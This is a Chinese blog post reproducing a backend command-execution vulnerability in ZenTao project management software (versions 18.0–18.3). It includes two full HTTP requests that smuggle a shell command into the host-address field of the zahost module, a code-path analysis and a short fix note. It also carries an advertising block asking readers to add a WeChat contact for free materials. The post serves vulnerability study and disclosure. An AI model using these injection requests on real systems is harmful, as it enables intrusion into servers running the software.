首页 > 其他分享 >禅道后台命令执行漏洞二

禅道后台命令执行漏洞二

时间:2023-08-28 17:33:41浏览次数:39  
标签:zahost 漏洞 test 后台 php 禅道 网安

漏洞简介

禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。

禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。

环境搭建

源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip

利用 phpstudy 来进行环境的搭建

漏洞复现

登录后台后访问添加宿主机

image

image

在 ip 域名处 拼接恶意 payload 触发漏洞

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

POST /index.php?m=zahost&f=create HTTP/1.1
Host: test.test
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=zahost&f=create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722
Connection: close
​
vsoft=kvm&hostType=physical&name=test2&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za

image

漏洞分析

这是禅道新增加的一个功能

image

image

增加新功能的同时也带来了新的风险点

module/zahost/control.php#create

image

module/zahost/model.php#create

image

module/zahost/model.php#checkAddress

image

module/zahost/model.php#ping

image

整个漏洞触发流程在断点调试的过程中一目了然

POST /index.php?m=zahost&f=edit&hostID=1 HTTP/1.1
Host: test.test
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=zahost&f=create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722;XDEBUG_SESSION=PHPSTORM
Connection: close
​
vsoft=kvm&hostType=physical&name=test4&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za

这样也是可以触发的

model.php:119, zahostModel-\>ping()
model.php:149, zahostModel-\>checkAddress()
model.php:94, zahostModel-\>update()
control.php:130, zahost-\>edit()
router.class.php:2199, router-\>loadModule()
index.php:74, {main}()

修复建议

更新至最新版本

image

执行命令时对地址进行了校验

更多网安技能的在线实操练习,请点击这里>>

 

标签:zahost,漏洞,test,后台,php,禅道,网安
From: https://www.cnblogs.com/hetianlab/p/17662940.html

相关文章

  • pikachu越权漏洞
    pikachu越权漏洞水平越权已知有如下账号lucy/123456,lili/123456,kobe/123456我们先用lucy的账号登录我们直接在上面的url直接把lucy改为kobe,发现可以越权登录到kobe的账号,并且查看kobe的个人信息我们再用lili的身份登录再来我们直接在上面的url直接把lili改为lucy,发现......
  • ThinkPHP 2.x任意代码执行漏洞
    ThinkPHP2.x任意代码执行漏洞原因:ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由:$res=preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e','$var[\'\\1\']="\\2";',implode($depr,$paths));导致用户的输入参数被插入双引号......
  • 基于Win32k内核提权漏洞的攻防对抗
    一、产生原因1.1Callback机制Win32k组件最初的设计和编写是完全建立的用户层上的,但是微软在WindowsNT4.0的改变中将Win32k.sys作为改变的一部分而引入,用以提升图形绘制性能并减少Windows应用程序的内存需求。窗口管理器(User)和图形设备接口(GDI)在极大程度上被移出客户端/......
  • CVE-2023-28432 MinIO 信息泄露漏洞
    MinIO简介MinIO是美国MinIO公司的一款开源的对象存储服务器,是一款高性能、分布式的对象存储系统.它是一款软件产品,可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过......
  • Weblogic远程代码执行漏洞CVE-2023-21839
    漏洞简介Oracle发布安全公告,修复了一个存在于WebLogicCore中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogicServer,成功利用该漏洞可能导致未授权访问和敏感信息泄露。影响版本OracleWeblogicServer12.2.1.3.......
  • 在线拍卖直播系统源码(双端APP+H5前端+管理后台)
    "东莞梦幻网络科技"开发该拍卖直播系统采用了多种开发语言。具体而言,后端采用了PHP语言,并且使用了ThinkPHP框架。而在移动端方面,苹果端采用了Objective-C语言,而安卓端则采用了Java。前端H5部分则使用了Vue.js框架。以下是该拍卖直播系统的主要功能模块:1、直播拍卖:用户可以观看主播......
  • Nacos漏洞总结
    Nacos简介Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。复现环境搭建本次复......
  • Acunetix v23.7 (Linux, Windows) - 漏洞扫描 (Web 应用程序安全测试)
    Acunetixv23.7(Linux,Windows)-漏洞扫描(Web应用程序安全测试)Acunetix|WebApplicationSecurityScanner请访问原文链接:https://sysin.org/blog/acunetix-23/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org重要提示AcunetixPremium现在使用日历化版本......
  • Nexpose v6.6.213 for Linux & Windows - 漏洞扫描
    Nexposev6.6.213forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseAug23,2023请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • Ruoyi框架漏洞复现总结
    若依管理系统简介若依管理系统(RuoyiAdminSystem)是一款基于Java开发的开源后台管理系统,旨在提供一个快速开发和部署企业级管理系统的解决方案。若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用SpringBoot框架。复现环境搭建首先上若依官网下载源码,官网地址:https:/......